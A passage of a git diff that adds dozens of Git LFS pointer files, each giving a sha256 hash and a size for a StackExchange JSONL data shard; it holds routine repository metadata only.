b/data/stackexchange/1-1/575_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1ddfa351617f74bc26244a0cff294cdfd5427b5c925982f9bda97ef17d2ddcc0 +size 34164986 diff --git a/data/stackexchange/1-1/576_2289.jsonl b/data/stackexchange/1-1/576_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e908ac634a1f1cd408fc395ebce64503e4f91dc2 --- /dev/null +++ b/data/stackexchange/1-1/576_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eb7af55b8793eb535bcb4416375bb3db101db1b91f4362cfd90d27dd7db4826e +size 34695977 diff --git a/data/stackexchange/1-1/577_2289.jsonl b/data/stackexchange/1-1/577_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9fe8cfca1d2925e380e3177aef39a8fd1ec38674 --- /dev/null +++ b/data/stackexchange/1-1/577_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:bf3306cfa409f90113839d2de8bad413f31c2b7a301976c2d268b4d9d57beb32 +size 34374824 diff --git a/data/stackexchange/1-1/578_2289.jsonl b/data/stackexchange/1-1/578_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..759bf8ee4c5030eb28d8fa9406b333654ff23101 --- /dev/null +++ b/data/stackexchange/1-1/578_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:171f854751901cd92c07b2a13c662dd5c63dd455ed60b9361fa5fa074a65fdf4 +size 34699039 diff --git a/data/stackexchange/1-1/579_2289.jsonl b/data/stackexchange/1-1/579_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..29f60dc5628f761ebcb50ecf4b0741da0e55cd31 --- /dev/null +++ b/data/stackexchange/1-1/579_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d835c50e15c6edc69e4b7d8ed083493e46c5f524ff91e1ef1ba4b416eb3d1dee +size 34154302 diff --git a/data/stackexchange/1-1/57_2289.jsonl b/data/stackexchange/1-1/57_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7959155b724f01d7c18833647e333f33b1481c64 --- /dev/null +++ b/data/stackexchange/1-1/57_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0e922996c2df518b5d8d333ff460420f05d1a005ac56dad8213d70d11871ce42 +size 39568771 diff --git a/data/stackexchange/1-1/580_2289.jsonl b/data/stackexchange/1-1/580_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bdb2193a819da18fbc7dab67bb0fefc1afece981 --- /dev/null +++ b/data/stackexchange/1-1/580_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9357d5d3f467344d755078539f9aafe324e09198f117419b0786f37d242f347e +size 33968992 diff --git a/data/stackexchange/1-1/581_2289.jsonl b/data/stackexchange/1-1/581_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..18c7d02e4d0b8067aaa6f84380a0832cad17903e --- /dev/null +++ b/data/stackexchange/1-1/581_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fd075618d35daf8ca3a7ed3de9846596f0c7886026136776945f3c64a9449f16 +size 34365170 diff --git a/data/stackexchange/1-1/582_2289.jsonl b/data/stackexchange/1-1/582_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d116629fc4a5bf652aa3a9a0ff941b7a62bc3e47 --- /dev/null +++ b/data/stackexchange/1-1/582_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f8669526b4d698c4afd36137d4c70a29b2fab2128cc6d0ffbffc588bc17be1d4 +size 34109531 diff --git a/data/stackexchange/1-1/583_2289.jsonl b/data/stackexchange/1-1/583_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7523279baae5cebe252330ec8d0d15edc9a90c37 --- /dev/null +++ b/data/stackexchange/1-1/583_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f16bb5d4463e75f55909233d96f39ed746a6c62c6e46f1aeaa1d3c471a5f0597 +size 33961515 diff --git a/data/stackexchange/1-1/584_2289.jsonl b/data/stackexchange/1-1/584_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b460ef575b9fc79b5f6543504140a5e01b11c972 --- /dev/null +++ b/data/stackexchange/1-1/584_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:53d750d962db4987740fe94a10811efe31b3db789fd23fe8ca096c65211a06d5 +size 33995693 diff --git a/data/stackexchange/1-1/585_2289.jsonl b/data/stackexchange/1-1/585_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..5551f206d81a8525c59372da3a1782fc3124e321 --- /dev/null +++ b/data/stackexchange/1-1/585_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:01282b17e3cb6d58404e24f1b6f2b387e1ae1c20fcf7e189994ac0e80569f010 +size 34535877 diff --git a/data/stackexchange/1-1/586_2289.jsonl b/data/stackexchange/1-1/586_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a151ab3a4b986f7c0b1628706514088949936479 --- /dev/null +++ b/data/stackexchange/1-1/586_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c2987283452bfcdde08c77dbfa5bc40054443f6aaadb1e16b093a2232323738b +size 34762809 diff --git a/data/stackexchange/1-1/587_2289.jsonl b/data/stackexchange/1-1/587_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e658e97ea4ff488f1e3e9f146d1c6f3fe05b13c2 --- /dev/null +++ b/data/stackexchange/1-1/587_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1141301ef1601af50bd1feb977f93f90ea833faa626a89c166e3aae6a83e6fc9 +size 34464234 diff --git a/data/stackexchange/1-1/588_2289.jsonl b/data/stackexchange/1-1/588_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..773a5da70bb09f03888ceb12c5b0e4d0c86d6274 --- /dev/null +++ b/data/stackexchange/1-1/588_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:302dcbe5879bb0a117ea9856ac07c4c98281f3a7835170c76aa92203c4a74bfd +size 34095970 diff --git a/data/stackexchange/1-1/589_2289.jsonl b/data/stackexchange/1-1/589_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e637be83f5dd7e8750e6245cb31af2f9e2aacf68 --- /dev/null +++ b/data/stackexchange/1-1/589_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6d40264bcc8af2957e1d1bdd539fc36d15731b85e718ca5f98d9fce409976a85 +size 34436991 diff --git a/data/stackexchange/1-1/58_2289.jsonl b/data/stackexchange/1-1/58_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e5174abaadd8344a26eca9b37cb4b76ac189d048 --- /dev/null +++ b/data/stackexchange/1-1/58_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ece3cc6adf112fc58f8aa56458932b66a69132a4e72fd9e97b4e3fa840844a8a +size 39763982 diff --git a/data/stackexchange/1-1/590_2289.jsonl b/data/stackexchange/1-1/590_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b344c035c4412b36d41ab41e62fbe8f4e23ed9bc --- /dev/null +++ b/data/stackexchange/1-1/590_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:06261ec6a22bc3a4eeb21498010140934bdf294cfe1d3cd189a0536766ad41b8 +size 34619622 diff --git a/data/stackexchange/1-1/591_2289.jsonl b/data/stackexchange/1-1/591_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..261826d8dac67e3ac6444bbf0081ac9888d90355 --- /dev/null +++ b/data/stackexchange/1-1/591_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:808240c208d4733965bf580bce9f160d31947171839f5459f6c2758119cd1615 +size 34386259 diff --git a/data/stackexchange/1-1/592_2289.jsonl b/data/stackexchange/1-1/592_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3599f0d25603545489b87664171d23f9f84a4091 --- /dev/null +++ b/data/stackexchange/1-1/592_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:5ed60439399e6059798926a3556c1ad52017f0e2828d8f265f58de5755595576 +size 33912486 diff --git a/data/stackexchange/1-1/593_2289.jsonl b/data/stackexchange/1-1/593_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..29bf4473d593f5c8e9363b8225e13694c8675f2c --- /dev/null +++ b/data/stackexchange/1-1/593_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:681b671f98c3c52c259f3ac07588134a0d15ab64ac12fb527d1180729b81f0a9 +size 34635442 diff --git a/data/stackexchange/1-1/594_2289.jsonl b/data/stackexchange/1-1/594_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bea7aba5e8c4467fa1faeaeada0c41b8802e1e44 --- /dev/null +++ b/data/stackexchange/1-1/594_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a2c066be2cdd6a30cff1fae273dfad6ab3c025517a6200b52a72f075229a5495 +size 34343504 diff --git a/data/stackexchange/1-1/595_2289.jsonl b/data/stackexchange/1-1/595_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4d587aca2dd4f054123347c3a8156ab73ca296ce --- /dev/null +++ b/data/stackexchange/1-1/595_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2415a85dbde9ec663fa45e003111f420bc9281c155f3420e140a8841d2827e74 +size 33975537 diff --git a/data/stackexchange/1-1/596_2289.jsonl b/data/stackexchange/1-1/596_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a1fa4fe258abc1885ecf3539b96c50446edfe36c --- /dev/null +++ b/data/stackexchange/1-1/596_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:254c473193f2205baa3bc86e24d8dd153ce5be0ca2613d26124b2093a72cfe1c +size 34470123 diff --git a/data/stackexchange/1-1/597_2289.jsonl b/data/stackexchange/1-1/597_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..40b3ad3cdd466b028697d171a136d0301493c000 --- /dev/null +++ b/data/stackexchange/1-1/597_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fe0c0c2b8597a55e7089ce9bc3fb83944fb374ab7abe34c7b4a7c096b461e283 +size 34197188 diff --git a/data/stackexchange/1-1/598_2289.jsonl b/data/stackexchange/1-1/598_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..789c147dbc34220cb60127123d8bba3c989578f3 --- /dev/null +++ b/data/stackexchange/1-1/598_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a85380aabff971b7542a44929632f2cbac517a525b85e0fb7ea64bbac0a42728 +size 34104143 diff --git a/data/stackexchange/1-1/599_2289.jsonl b/data/stackexchange/1-1/599_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2958228d0cc43a33af7a864549922a43ac9b1f79 --- /dev/null +++ b/data/stackexchange/1-1/599_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:33ddba1d1706683f4ee1b7ecf7f3b053965473860c67012fb9330c28e84ed15e +size 34529565 diff --git a/data/stackexchange/1-1/59_2289.jsonl b/data/stackexchange/1-1/59_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f777818c8b0a4dd26a186cdb68a848643442e9f4 --- /dev/null +++ b/data/stackexchange/1-1/59_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:781e9e433615be963bfcc5d7bd9a042aa04c0fddff5c421df0bc8f4fa41d464a +size 39711458 diff --git a/data/stackexchange/1-1/5_2289.jsonl b/data/stackexchange/1-1/5_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..e59b2f26aa982972f5458aa6f15c3ba2644356f2 --- /dev/null +++ b/data/stackexchange/1-1/5_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:89832e86c4a27dec6d10a3754351ac0e40ff58497950aa79b59640fb6beb556a +size 36003595 diff --git a/data/stackexchange/1-1/600_2289.jsonl b/data/stackexchange/1-1/600_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1aca31d1692ee511dbd3bae2fcdd0f2b31881259 --- /dev/null +++ b/data/stackexchange/1-1/600_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3ee69b72b424dbb519a8973626b5d05156c0186f2d8bcace90a40bea4b8ff5a3 +size 41647105 diff --git a/data/stackexchange/1-1/601_2289.jsonl b/data/stackexchange/1-1/601_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b228b272fa1cfd20e9e90e9afcfcfdbdc95a65bb --- /dev/null +++ b/data/stackexchange/1-1/601_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bf81606ec619f7b1a123411fd70a1c9a610c75c13643f5d236f3924f16514ae3 +size 41804181 diff --git a/data/stackexchange/1-1/602_2289.jsonl b/data/stackexchange/1-1/602_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d2438fc4c90a1fd290664e0119c1a2298bd2fb7a --- /dev/null +++ b/data/stackexchange/1-1/602_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7f2e945ffcbd411908871c5e31f3d555a7419f5b9aac0e518e03d5e7f10753a2 +size 42101482 diff --git a/data/stackexchange/1-1/603_2289.jsonl b/data/stackexchange/1-1/603_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..75b077bd13df4210e301234d43ed66925c0a5cee --- /dev/null +++ b/data/stackexchange/1-1/603_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:481f488b22c14d999b14afdedfea50be581cf33d8734fb0725bb46cde1d287c6 +size 41962661 diff --git a/data/stackexchange/1-1/604_2289.jsonl b/data/stackexchange/1-1/604_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d9229eb4da0ceaf869d282e4a84f971e77a29992 --- /dev/null +++ b/data/stackexchange/1-1/604_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ffcc8c5764e0c42264d50282bb5d8132077823cc071c23bfa1be4c34f1ad4379 +size 42018513 diff --git a/data/stackexchange/1-1/605_2289.jsonl b/data/stackexchange/1-1/605_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c124e79d2270936589524d52ad04ec5fa6350994 --- /dev/null +++ b/data/stackexchange/1-1/605_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7de8063afbd2572aed48bcee876ca5ce1c4e7e325d263cb2740bff3cf8c29331 +size 41590354 diff --git a/data/stackexchange/1-1/606_2289.jsonl b/data/stackexchange/1-1/606_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..df509dc301a43f6badf69503daea0c0c59a81078 --- /dev/null +++ b/data/stackexchange/1-1/606_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b6d0a12078d467b7898aafedc7b7237a6be4e15c2c3de6daf8ff6fdba52ba6fa +size 41904205 diff --git a/data/stackexchange/1-1/607_2289.jsonl b/data/stackexchange/1-1/607_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..90a746a59bb2a100dfb542ee33e58f53a2b5ca90 --- /dev/null +++ b/data/stackexchange/1-1/607_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:c766b5bc8bd3f1e2986c4a19832babe49a44a42a256a8b1148fa18c8f69075d8 +size 41515606 diff --git a/data/stackexchange/1-1/608_2289.jsonl b/data/stackexchange/1-1/608_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8e920cba7ca6be539c875e4cd0f7b2099efc0ec7 --- /dev/null +++ b/data/stackexchange/1-1/608_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:41c0ccfa099e789cbb4bfd89aa9bb04d5278dd9ed05e3afbac83ef55bafc2420 +size 42266228 diff --git a/data/stackexchange/1-1/609_2289.jsonl b/data/stackexchange/1-1/609_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d7118246940e54386b8a5ee4834fba6ee9655d1f --- /dev/null +++ b/data/stackexchange/1-1/609_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:48ea60b02e5cd1be8f26079697d12ebf4584b2f20bcf748e5951fb21fadf22d6 +size 42620685 diff --git a/data/stackexchange/1-1/60_2289.jsonl b/data/stackexchange/1-1/60_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0a57df10d9b796fab64f2d91ce31457d3065e2e0 --- /dev/null +++ b/data/stackexchange/1-1/60_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4fb7722cd7c90148c204b0ee181156e46823be050df7150162e54511af9ccca8 +size 38810941 diff --git a/data/stackexchange/1-1/610_2289.jsonl b/data/stackexchange/1-1/610_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f3979caab7e280a0d1edf6dc6723336c1c6268ba --- /dev/null +++ b/data/stackexchange/1-1/610_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:97d43304f31f72f041702bdab8f7ba2127bf25838a6593c43a125525cda32015 +size 42046389 diff --git a/data/stackexchange/1-1/611_2289.jsonl b/data/stackexchange/1-1/611_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c85715fa7d4b7a1ba7ebb69fd761dcd51011ab64 --- /dev/null +++ b/data/stackexchange/1-1/611_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:586b682cbce41c2f9b48c2933319e92f0028a6190126bdb752deca0043adb499 +size 41720819 diff --git a/data/stackexchange/1-1/612_2289.jsonl b/data/stackexchange/1-1/612_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f3d419633f592fad8b67e239a0e58fa0f2da2691 --- /dev/null +++ b/data/stackexchange/1-1/612_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:02898e8b26dcb1ff993691c9edcb770e352c093c704a291ee54a4b0cfe5780ba +size 41701659 diff --git a/data/stackexchange/1-1/613_2289.jsonl b/data/stackexchange/1-1/613_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..35a4c15689e36f2324bfb81b4b9777df9ada2f7f --- /dev/null +++ b/data/stackexchange/1-1/613_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8dacbf371a46f1617c3988f29a22bb50165fe6f6031ef1b4f0608162f5783c24 +size 42051405 diff --git a/data/stackexchange/1-1/614_2289.jsonl b/data/stackexchange/1-1/614_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bc0d06dcebaf55f411d59ba165710f9c2ec9d661 --- /dev/null +++ b/data/stackexchange/1-1/614_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ddb3e840048ec59649d81f17e8373504e475cc1512ff90d448836f0582250383 +size 41071143 diff --git a/data/stackexchange/1-1/615_2289.jsonl b/data/stackexchange/1-1/615_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..1f2d5f8e394348d8ff9fdca288e6a1ed0ddd8ff0 --- /dev/null +++ b/data/stackexchange/1-1/615_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:21286beb8ce3b00410b0c590f3a768b46c8625b1f2a5932f099d6b2af183340a +size 41093522 diff --git a/data/stackexchange/1-1/616_2289.jsonl b/data/stackexchange/1-1/616_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..27e8947757efc99ca8590d3b6e1b8e54e82e5bc1 --- /dev/null +++ b/data/stackexchange/1-1/616_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:91b7b79e08afbd177111c8e650f65be0564b47ca38329a4031e3446c97f0c06b +size 41722570 diff --git a/data/stackexchange/1-1/617_2289.jsonl b/data/stackexchange/1-1/617_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5e51ca5f1e03cb9d021178905bd0ba6565b646e3 --- /dev/null +++ b/data/stackexchange/1-1/617_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dd9ee5fae871ebc617f467260cc7a9fa0a1e9dbdbf16955b92d1ac7daa9c0c38 +size 41827798 diff --git a/data/stackexchange/1-1/618_2289.jsonl b/data/stackexchange/1-1/618_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6db0df421f9eb4d44565bf8805dd1a9127b6a4cc --- /dev/null +++ b/data/stackexchange/1-1/618_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:10559f2411c0e6db7f5f466e16615114d028262c6bfeac9c39e8b7d318ef0606 +size 42277515 diff --git a/data/stackexchange/1-1/619_2289.jsonl b/data/stackexchange/1-1/619_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ad9287e022bdbb9c9519e1ca6be8c0ac529a9f54 --- /dev/null +++ b/data/stackexchange/1-1/619_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:87262b594f49390a64107624930e4ca24a751ec8d03a846a7f9553e9fb84514c +size 41991826 diff --git a/data/stackexchange/1-1/61_2289.jsonl b/data/stackexchange/1-1/61_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..10d2522655d7068ae581d5af22bcf72526830e7e --- /dev/null +++ b/data/stackexchange/1-1/61_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b82ba4a746ba7a59389c0ecdf09c09fcb7172bd420484d5e8240596a3494838d +size 39724324 diff --git a/data/stackexchange/1-1/620_2289.jsonl b/data/stackexchange/1-1/620_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..907b91cefcd81422d21881ff9b6b11a9e9963785 --- /dev/null +++ b/data/stackexchange/1-1/620_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2b97bb90205cbeaf2cf67100ac6f881ea455e368a4a4e4c193609be7ce528bbb +size 41032725 diff --git a/data/stackexchange/1-1/621_2289.jsonl b/data/stackexchange/1-1/621_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d125465c9cbd37a5f07ab5b86cd283480d458fcb --- /dev/null +++ b/data/stackexchange/1-1/621_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f6e080638660fb530ae7b147bda203db01e7a724d166f9fc4f22561f0008765c +size 41352612 diff --git a/data/stackexchange/1-1/622_2289.jsonl b/data/stackexchange/1-1/622_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..074733fefecd3525599e8be60f6929d8e89d3c17 --- /dev/null +++ b/data/stackexchange/1-1/622_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:bab724bc8bc4364fae60a6a8f2077c364ae254e6946572df7c69475fc5f94317 +size 41594900 diff --git a/data/stackexchange/1-1/623_2289.jsonl b/data/stackexchange/1-1/623_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..161f1e81e7c7e69e67e90ce965455adfb16a0a6e --- /dev/null +++ b/data/stackexchange/1-1/623_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5ad6f37f0aa3a6124d977e5adaaa7ab08dbf780f6fc8e40cc6509d3b8de121ce +size 42091623 diff --git a/data/stackexchange/1-1/624_2289.jsonl b/data/stackexchange/1-1/624_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..111b1b4e68d4edc39dfe281a08affe0953fe1445 --- /dev/null +++ b/data/stackexchange/1-1/624_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b9f0f6851868cbb4e7c08ff7911eb8a53c8a3ee76dae15c180d3142fcb4b9e4b +size 42023969 diff --git a/data/stackexchange/1-1/625_2289.jsonl b/data/stackexchange/1-1/625_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8db51bdcbd7d3a6920fe0b32d734484fe991fca7 --- /dev/null +++ b/data/stackexchange/1-1/625_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f4868aa11797ac78b69ec5a5ddc3f03d2afb540e062245207a8da2231b43609a +size 41159650 diff --git a/data/stackexchange/1-1/626_2289.jsonl b/data/stackexchange/1-1/626_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0e6bed4a789dd1ddded4b53f98d45991ce1520da --- /dev/null +++ b/data/stackexchange/1-1/626_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8e2226233511268bf24b50cacd17318c57acb9a7635c55c15c30afb5e42d4f7e +size 41265755 diff --git a/data/stackexchange/1-1/627_2289.jsonl b/data/stackexchange/1-1/627_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f0779cb08263e0c07c667aaab1894aea8f348867 --- /dev/null +++ b/data/stackexchange/1-1/627_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cb939dc908228c67556deac92df919fe1c566961ddc8a76589d54cd8742d037b +size 41802470 diff --git a/data/stackexchange/1-1/628_2289.jsonl b/data/stackexchange/1-1/628_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8de7c0ea315a3f4ff331bc8e243273ab371484d0 --- /dev/null +++ b/data/stackexchange/1-1/628_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ee0602fb6601a877d07f92127f3d42e73edb993af0953f2329afe11963deffe2 +size 41963837 diff --git a/data/stackexchange/1-1/629_2289.jsonl b/data/stackexchange/1-1/629_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..db1faef67ed3cbde1a19cf8e4372b6aefd80295e --- /dev/null +++ b/data/stackexchange/1-1/629_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f9a567cf5a181b2dd078f155a632c5364e34fc0d4042c6411a5ed90d5e29ae6f +size 41896542 diff --git a/data/stackexchange/1-1/62_2289.jsonl b/data/stackexchange/1-1/62_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8272ce54cf6b36da5ac916b2a0756647dede4944 --- /dev/null +++ b/data/stackexchange/1-1/62_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ff177515d11c20980ef63f8126546bcbace12ca78152444627debbf05b8ee6ad +size 39981463 diff --git a/data/stackexchange/1-1/630_2289.jsonl b/data/stackexchange/1-1/630_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..689b050ce7021c916d1b07984677b8265638f280 --- /dev/null +++ b/data/stackexchange/1-1/630_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:857713e01f55cf8db4e961e26ac609bb0aa5ecdca3d8df6f1675b3cb230c7f92 +size 41851950 diff --git a/data/stackexchange/1-1/631_2289.jsonl b/data/stackexchange/1-1/631_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d608561937f7f7d5758614e41a9bd4ccac7b3e34 --- /dev/null +++ b/data/stackexchange/1-1/631_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1b3e6cdc6476ae18a845141c337b3b622321e393ddbe1a8ebbadc7f3ea9ae889 +size 41220827 diff --git a/data/stackexchange/1-1/632_2289.jsonl b/data/stackexchange/1-1/632_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a686d77792659417832a6145946197b025b6fbde --- /dev/null +++ b/data/stackexchange/1-1/632_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9092e7f6d507c48dacacb3b60dd10a95ed9eb55ce85ca91904e35391e2a45d7e +size 40785998 diff --git a/data/stackexchange/1-1/633_2289.jsonl b/data/stackexchange/1-1/633_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..953460ca5290d8c6ff1c33012a28e6421d91fbbc --- /dev/null +++ b/data/stackexchange/1-1/633_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b77b11297dc16135a1557721234dc1797b9255dd5127a2fad60efc22a17c6298 +size 42064015 diff --git a/data/stackexchange/1-1/634_2289.jsonl b/data/stackexchange/1-1/634_2289.jsonl new file mode 100644 index 